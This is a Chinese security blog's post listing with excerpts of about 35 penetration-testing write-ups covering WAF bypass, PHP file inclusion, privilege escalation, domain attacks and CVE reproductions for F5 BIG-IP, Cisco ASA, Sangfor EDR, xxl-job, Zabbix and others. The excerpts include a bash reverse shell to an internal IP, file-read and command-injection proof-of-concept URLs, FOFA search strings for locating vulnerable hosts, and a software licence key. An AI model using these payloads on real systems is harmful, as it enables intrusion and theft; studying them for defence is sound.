- 博客(59)
- 收藏
- 关注
RSS订阅
原创 Bypass学习
一、网站防护分类- 源码防护:使用过滤函数对恶意攻击进行过滤,绕过思路:①大小写替换②变换提交方式:如get请求变post/cookie请求绕过③编码绕过:url编码、基于语句重叠、注释符等- 软件WAF:通过访问速度、指纹识别等特征进行拦截;常见软件WAF如安全狗、D盾、云锁、云盾等,软件WAF侧重拦截web漏洞。通过访问阈值的大小判断为CC攻击,进行IP封锁;- 硬件WAF:主要防御流量和部分web攻击。常见硬件WAF如天融信、深信服等厂商的防火墙。硬件WAF基于TCP三次握手封锁真实
2020-09-10 23:51:43
2050
2
原创 003-漏洞梳理篇之php伪协议
PHP伪协议指的是PHP所支持的协议与封装协议(共12种),在web渗透漏洞利用中常用于配合文件包含进行web攻击,从而获取网站权限。环境概要:php.ini配置文件参数:allow_url_fopen :on #默认开启 ,表示允许url里的封装协议访问文件;allow_url_include:off #默认关闭,表示不允许包含url里的封装协议包含文件;...
2020-08-22 10:45:50
4848
1
原创 002-漏洞梳理篇之php反序列化
php序列化函数1.序列化函数serialize()序列化的目的是方便数据的传输和存储。当在php中创建了一个对象后,可以通过serialize()函数把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。测试代码如下;<?phpclass chybeta{ var $test = '123';}$class1 = new chybeta;$class1_ser = serialize($class1);print_r($class1_ser);?>#创建一个对象,
2020-08-20 23:53:41
167
1
原创 001-漏洞梳理篇之文件包含
文件包含在开发中,重复使用的代码函数开发人员会汇总放到单个文件中,需要使用某个函数时直接调用此文件。这个调用过程称为文件包含。为了使代码更灵活将被包含的文件设置为变量用来进行动态调用。这就导致客户端可以调用一个恶意文件,造成文件包含漏洞。文件包含漏洞在php中居多。造成执行任意代码、包含恶意文件控制网站、敏感文件读取等危害常见文件包含函数include():执行到include时才包含文件,找不到被包含文件时产生警告,但是脚本继续执行。require():程序一运行就包含文件,找不到被包含的文件产
2020-08-18 00:25:38
364
原创 004--域渗透学习
一、Kerbers协议NTLM认证域内访问其他应用服务整个流程如图所示,首先由客户端向域控发起认证请求,域控验证用户是否属于合法域用户,若合法则认证通过,域控响应主机请求分发TGT认证票据(黄金票据可伪造TGT),拿到证书后主机可以继续请求访问域内的应用服务,若权限符合域控会返回允许主机访问域内某应用服务的TGS票据,主机拿着TGS票据访问对应的应用服务,该应用服务器验证TGS通过后主机即可顺利访问应用服务。TGTTGT验证用户是否属于合法域用户,合法域控则分发TGT认证票据。黄金票据用于伪
2020-08-04 22:44:28
1141
原创 003--横向渗透的常见方法
在已经攻占部分内网主机的前提下,利用现有的资源尝试获取更多的凭据、更高的权限,进而达到控制整个网段、拥有最高权限的目的。在很多时候,内网渗透的起点往往只是一台通过各种漏洞漏洞攻陷的跳板,通过这个突破口去不断扩大在本网段内的战果,是为横向渗透。一、系统漏洞0day二、流量监听三、ARP欺骗四、服务密码攻击...
2020-07-22 21:37:25
2875
原创 002--使用代理工具实现纵向渗透
利用代理工具将内网的流量代理到本地进行访问,这样方便我们对内网进行纵向渗透。代理工具区分为正向代理和反向代理。正向代理就是将流量发送代理设备,由他代替本地主机去访问内网目标;一般情况下防火墙不会允许外网机器随意访问内网,由内网主机主动交出权限到代理机器,然后本地去连接代理机器,形成反向代理。代理的本质是Socks协议,Socks协议又叫做防火墙安全会话转换协议,工作在OSI参考模型的第5层(会话层)。使用TCP协议传输数据,因而不提供如传递ICMP信息之类的网络层相关服务。目前支持SOCKS4和SOCKS
2020-07-14 23:50:31
2375
原创 001--内网渗透之信息收集
当我们通过渗透进入内网环境后,对网络拓扑一无所知,测试人员应先对当前网络环境做出判断。对当前机器角色分析,对机器所处网络环境拓扑结构分析,对机器所处区域分析。从而展开下一步攻击。对机器所处网络环境分析对所处内网进行全面数据收集和分析整理,绘制出大致的内网整体结构拓扑。对机器所处区域分析判断机器所处于网络拓扑哪个区域,是在DMZ区、办公区、核心区。区域并不是绝对的,所以区域界限也是相对的。落地机角色分析判断当前主机是web服务器、开发测试服务器、公共服务器、文件服务器、代理服务器、dns服务器、存
2020-07-09 23:41:32
608
原创 004--利用系统溢出漏洞提权
溢出漏洞提权是利用目标操作系统层漏洞进行权限提升,通常步骤是拿到shell后获取目标机器的补丁信息,通过目标的补丁情况获取相对应的漏洞,进行提权Windows 溢出提权#Windows查看补丁信息,或者直接systeminfowmic qfe get Caption,description,hotfixid,installedon提权辅助工具windows-exploit-suggester项目地址:https://github.com/AonCyberLabs/Windows-Exploit-
2020-07-05 21:52:44
858
原创 003--Windows系统提权之数据库提权
在利用系统溢出漏洞无果的情况下,可以尝试采用数据库进行提权。数据库提权的前提条件:拥有数据库最高权限用户密码。除Access数据库外,其他数据库基本都存在数据库提权的可能。sqlserver、MySQL都需要具备数据库管理员权限才可执行提权操作。linux系统下mysql root用户是服务用户,权限不足以提权。Windows下mysql root权限很高。zkeys、宝塔等集成环境有降权mysql rootsql server数据库提权流程:获取账号>数据库登录>安装组件>开启33
2020-07-04 17:51:44
1108
3
原创 002--第三方软件提权之FTP软件
server_U 提权对于不可写权限,serv_u 6.4以下的,如果默认密码没有修改的,直接可以提权。serv_u 7以上的可以修改下脚本提权目录,不要用默认的C盘,改在其他盘符用脚本提权。serv-u的默认端口是43958,密码文件的安装目录 c:\Program Files\Serv-u\SerUDaemon.ini方法一、读取配置文件1.server-u默认安装目录下的ServUDaemon.ini文件记录着所有的ftp账号信息(32位默认安装路径C:\Program Files (x86)
2020-07-04 11:02:33
1188
原创 【漏洞复现】CVE-2020-0796 SMBv3远程代码执行
攻击者可能利用此漏洞远程无需用户验证,通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,受攻击的目标系统只需开机在线即可能被入侵。从而获取机器的完全控制,利用端口445影响版本:漏洞主要影响Windows10版本(1903和1909),包括32位、64位的家用版、专业版、企业版、教育版资源检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip蓝屏EXP:https://github.com/eerykitty/CVE-2020
2020-06-30 22:08:50
381
1
原创 GETSHELL学习总结
分类带有漏洞的应用redis 、tomcat、解析漏洞、编辑器、FTP常规漏洞sql注入、上传、文件包含、命令执行、Struts2、代码反序列化后台拿shell上传、数据库备份、配置插马关于各种带有漏洞的应用以及OWASP Top10常规漏洞需要不断的积累,打造自己的核心的知识库,道路且长。本文仅记录最近对常见cms后台getshell的学习总结网站getshell方法1.数据库备份拿shell如果网站后台具有数据库备份功能,可以将webshell格式先修改为允许上传的文件格式如jpg,
2020-06-29 00:23:25
4424
原创 一道靶场面试题的解题思路
一、缘起群里老哥丢出来一个某厂的面试靶场,跟着大佬学了些思路,记录如下。整体流程:sql注入读取网站配置文件>拿到tomcat登录账号密码>登录tomcat上传war包>getshell。以下是脱敏后记录的详细过程:二、 初探目标是一个阉割版ecshop搭建的商城系统,利用已公开的漏洞无法拿下…目标:http://1x.x.x.x:8080/eshop/UserLogin.jsp直接web路径访问端口:http://1x.x.x.x:8080/发现tomcat的管理界面入口:
2020-06-11 01:02:33
986
原创 一次弱口令引发的逻辑漏洞
概要:HW前公司接了个活,命名叫五月专项行动。其实就是来白嫖漏洞的。本次渗透在授权条件下对目标系统进行渗透测试,通过前台的弱口令到后台越权遍历用户名及密码,一套流程下来纵享丝滑,脱敏以本文作为记录:用户名枚举从目标前台简单的登陆框下手。没有使用验证码,且账号密码登陆情况未模糊化,可以直接爆破:以弱口令123456作为密码枚举用户名:遍历到hw、wb、yangfan等用户名。另外还有惊喜:没错不仅遍历到lichao用户,而且他密码还是123456。可以直接登陆。其实上面几个爆出来用户名都是弱口
2020-05-23 11:27:43
547
2
原创 CVE-2021-3156: sudo缓冲区溢出漏洞
在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。影响版本Sudo 1.8.2 - 1.8.31p2Sudo 1.9.0 - 1.9.5p1不受影响的版本Sudo =>1.9.5p2用户可以使用如下方法进行自查: 以非root用户登录系统,并使用命令sudoedit -s /如果响应一个以sudoedit:开头的
2021-02-01 15:03:58
468
原创 骑士cms文件包含getshell复现
00X1 测试环境骑士 CMS 6.0.48以下均存在此漏洞,本文复现使用骑士cms 6.0.20,下载地址:http://www.74cms.com/download/index.html注意骑士cms不支持php7.x,复现php环境为php5.6。安装包下载完毕后直接在phpstudy下,访问upload/install.php进行安装,根据提示逐步安装即可。00X2 漏洞复现1.模板注入写入文件,POChttp://192.168.23.128/74cms_v6.0.20/uplo
2020-12-14 22:37:44
1633
原创 xxl-job后台getshell
使用弱口令尝试登录(admin:admin root:root admin:123456)#!/bin/bashbash -i >& /dev/tcp/10.0.128.48/4444 0>&1随意命名备注名称,点击保存监听端口,点击执行,回弹shell
2020-12-14 22:32:10
1021
原创 Jupyter Notebook 未授权访问漏洞
如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。选择 new -> terminal 即可创建一个控制台进行命令执行:
2020-12-14 22:30:17
281
原创 Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)
Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。目前公开的 POC 因为使用了 linux 特有的环境变量,所以目前这个 POC 只能作用于 linux 机器。启动环境前,需要先在Docker主机上执行如下命令,修改vm.max_map_count配置为262144:sysctl -w vm.max_map_count=262144之后,执行如
2020-12-14 22:29:21
524
3
原创 xxl-job未授权命令执行
https://vulhub.org/#/environments/xxl-job/unacc/8080端口:管理端9999端口:客户端poc:POST /run HTTP/1.1 Host: 10.0.128.46:9999 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,ap
2020-12-14 22:26:03
881
1
原创 Apache Solr 模板注入远程命令执行
fofa语法:FOFA:app="Solr" && country="CN" 该漏洞的产生是由于两方面的原因:1.当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改。2.Apache Solr默认集成VelocityResponseWriter插件,在该插件的初始化参数中的params.resource.loader.enabled这个选项是用来控制是否允许参数资源加载器在Solr请求参数中指定模版,默认设置是fals
2020-12-14 22:16:21
274
1
原创 Apache Spark 未授权访问漏洞
Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。本次复现使用docker+vulhub一键搭建:docker-compose up -d环境启动后,会自动启用四个端口:8080,8081,6066,7077他们分别为:master的管理页面:http://your-ip:8080slave的管理页面:http://your-ip:8081standalone模式下,maste
2020-12-14 22:05:33
3515
1
原创 zabbix后台RCE
vulhub有现成的zabbix环境git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.gitcd vulhub/zabbix/CVE-2016-10134/docker-compose up -dzabbix默认口令admin\zabbix1.写脚本http://1.1.1.1/zabbix/zabbix.php?action=script.edit&scriptid=4bash -i>&
2020-11-24 21:18:07
1233
转载 Apache Flink RCE 漏洞复现
介绍Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。测试环境:Flink 1.9.1 java8+。Apache Flink 1.9.1安装包下载https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1
2020-11-24 21:08:33
677
1
原创 深信服EDR
深信服EDR 任意用户登录fofa语法:body="终端检测响应平台"title="终端检测响应平台"title="SANGFOR终端检测响应平台"payload:https://1.1.1.1/ui/login.php?user=adminEDR RCEpochttps://x.x.x.x/tool/log/c.php?strip_slashes=system&host=idhttps://x.x.x.x/tool/log/c.php?strip_slashes=s
2020-11-24 15:11:41
1464
原创 宝塔服务器面板漏洞
宝塔服务器面板漏洞,phpmyadmin没加鉴权 IP:888(宝塔服务端口)/pma可直接登陆数据库。漏洞版本为7.4.2http://1.x.x.x:888/http://1.x.x.x:888/pma/
2020-11-21 14:56:47
2334
原创 致远OA文件写入
该系统的漏洞点在于致远OA-A8系统的Servlet接口暴露,安全过滤处理措施不足,使得用户在无需认证的情况下实现任意文件上传。攻击者利用该漏洞,可在未授权的情况下,远程发送精心构造的网站后门文件,从而获取目标服务器权限,在目标服务器上执行任意代码漏洞。影响范围:致远A8-V5协同管理软件 V6.1sp1致远A8+协同管理软件 V7.0、V7.0sp1、V7.0sp2、V7.0sp3致远A8+协同管理软件 V7.1上面是CNVD发布的漏洞影响范围,但我在V6.1_SP2版本依然测试成功,不知道为
2020-11-21 14:54:31
2296
2
原创 天融信TopApp-LB 负载均衡系统
fofa:"TopApp-LB"1.任意用户登录①用户名随意 密码:;id(天融信负载均衡TopApp-LB系统无需密码直接登录)②用户名: ; ping 9928e5.dnslog.info; echo 密码:随意登录成功2.sql注入漏洞注入点vidt=l&e=0&s=t&l=1&vid=1'--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=
2020-11-21 14:51:03
2140
原创 CVE-2020-8209(Citrix Endpoint Management )XenMobile-控制台存在任意文件读取漏洞
CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。(该软件国外居多,国内基本很少)RP2之前的Citrix XenMobile Server 10.12,RP4之前的Citrix XenMobile Server 10.11,RP6之前的Citrix XenMobile Server 10.10和Citrix XenMobile Server 10.9 RP5之前的访问控制不当,从而导致能够读取任意文件。影响版本RP2之前的XenMobile服务器
2020-11-21 14:47:32
332
原创 Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10204),CVE-2020-11444 越权漏洞
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞,这个漏洞是CVE-2018-16621的绕过。CVE-2020-10199:Nexus Repository Manager OSS/PRo <=3.21.1,需有低权限账号。CVE-2020-10204:Nexus Repository Manager OSS/PRo <=3.21.1,需有管理员账号。
2020-11-21 14:45:18
1732
原创 CVE-2020-3452(CISCO ASA设备任意文件读取漏洞复现)
抓包POCGET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1Host: 152.115.185.50User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: te
2020-11-21 14:40:10
1453
原创 CVE-2020-5902 BIG-IP RCE漏洞复现
影响范围版本号主要如下11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x文件读取poccurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileN
2020-11-21 14:38:25
169
1
原创 记不住的命令
Windows1.运行窗口命令#服务services.msc#网络配置ncpa.cpl#RDP登录mstsc#注册表gpedit#计算器calc#系统配置msconfig#日志eventvwr.msc#控制面板control #域dcpromo#记事本notepad#画图板mspaint#本地用户和组lusrmgr.msc#磁盘清理工具cleanmgr#计算机管理compmgmt.msc#共享文件夹管理fsmgmt.msc#组策略gped
2020-07-19 11:55:42
2324
原创 001-提权基础
拿到一个网站的webshell权限之后,可以控制整改网站,但是相对于整个系统来说权限较小。如果想要控制整个服务器,则需要进行系统提权,通过对此服务器的控制从而进一步渗透内网。通常来说,不同脚本类型的shell拥有的权限也不相同。通常脚本所处的权限:ASP/PHP>网络服务用户,匿名权限ASPX>普通用户,USER权限,可调用cmd.exejsp> 通常是系统管理员权限脚本所处的权限取决于运行容器的用户身份。即:如果脚本以phpstudy/aspweb类似集成环境搭建的网站,拿下
2020-07-04 01:40:29
204
原创 421 Server is temporarily unavailable - please try again later,421 Service closing control connectio
原因是安装了server-U软件未输入注册码,会出现这个情况。解决办法:许可》输入密钥即可密钥:Registration ID 9dK4g4iPhvOsoEY9nprEiSsmW7OUqFaGuwHT1CtBn9K6hQVg0bd2okQ9ldel+1IGE9b4xDP0q2W+vE4vgZLA7unm6t3CxTI
2020-07-02 22:06:52
1288
1
原创 vmware虚拟机硬盘扩容
1.关闭虚拟机2.设置》硬盘》扩展如果扩展选项为灰色,无法扩大硬盘,需要删除快照,没有快照就在当前位置下创建快照然后删除,这样就可以扩展了。3.扩展完成后,还需要进入虚拟机分区win+r》compmgmt.msc...
2020-06-30 23:43:13
182
转载 Venom工具的使用
前提:已经拿到某服务器shell,可以上传文件且具有执行权限;项目地址(编译后):https://github.com/Dliv3/Venom/releases一、进入内网1.上传admin_linux_x64到vps端,运行并监听本地11111端口:chmod 777 admin_linux_x64./ admin_linux_x64 -lport 111112.利用已经拿到的的shell上传agent_linux_x64文件到目标服务器,并执行chmod 777 agent_linu
2020-05-23 12:59:01
4084
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人